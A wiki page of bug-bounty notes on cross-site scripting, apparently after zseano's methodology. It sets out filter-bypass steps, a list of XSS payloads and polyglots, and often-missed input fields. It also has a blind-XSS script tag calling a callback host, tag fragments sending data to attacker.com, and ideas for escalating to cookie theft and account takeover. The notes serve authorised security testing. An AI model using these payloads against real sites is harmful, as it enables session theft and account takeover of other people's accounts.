Cybersecurity

User Tools

Site Tools

Trace: zseano auth_session welcome xss
zseano:xss

Table of Contents

XSS Testing

Cross-site scripting is high-frequency, chains well with CSRF and IDOR, and is worth testing on every input.

Testing Process

  1. Test basic HTML injection – can you input <h2>, <img>, <table> without filtering?
  2. Check encoding – reflected as &lt;script&gt; or %3Cscript%3E? Test double encoding: %253C, %26lt;
  3. Reverse engineer the filter – blocking complete tags only? Try unclosed tag: <script src=attacker.com?c= - Test blacklist gaps: <svg>, <%00iframe>, on%0derror, </script/x>, <ScRiPt> - Test every reflected parameter for both reflected and blind XSS - Check WAF behavior – sometimes they only filter parameter values not names ===== Filter Bypass Flow ===== - How are non-malicious HTML tags handled? <h2>, <b> - What about incomplete tags? <iframe src=attacker.com/c=
  4. How do they handle encodings? <%00h2>, %0d, %0a, %09
  5. Is it a blacklist of hardcoded strings? Does </script/x> work? <ScRiPt>?
  6. Does the blacklist apply to file uploads too?

Common Bypass Payloads

<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<ScRiPt>alert(1)</ScRiPt>
<%00script>alert(1)</script>
</script/x><script>alert(1)</script>
<iframe src=//attacker.com/c=

Polyglot Payloads

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A
" onclick=alert(1)//<button ' onclick=alert(1)//>

Input Vectors Often Missed

  • CSS customization fields (themes, profile colors)
  • Event/meeting name fields
  • Third-party integrations (Facebook import, OAuth name fields)
  • JSON POST body values
  • File upload filenames: photo.jpg<svg onload=confirm()>
  • SWF parameters: onload, allowedDomain, movieplayer, xmlPath, callback
  • Fake/injected parameters: ''?realparam=1&foo=bar'+alert(/XSS/)+'
  • Custom error pages
  • Mobile app signup – different codebase, different filtering

Blind XSS

Use a blind XSS payload that calls back to your server (XSS Hunter, interactsh): 

"><script src=https://yourxsshunter.xss.ht></script>

Test in:

  • Support ticket fields
  • Admin-visible fields (name, bio, feedback)
  • Log-visible fields (User-Agent, Referer, X-Forwarded-For)

Escalating XSS

  • Chain with CSRF to perform state-changing actions from victim's browser
  • Steal session cookies if HttpOnly is not set
  • Use XSS to exfiltrate payment info from the DOM
  • Use XSS + no second confirmation for email/password change = account takeover
  • Self-XSS + CSRF = stored XSS affecting other users

See Also

zseano/xss.txt · Last modified: by drew
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki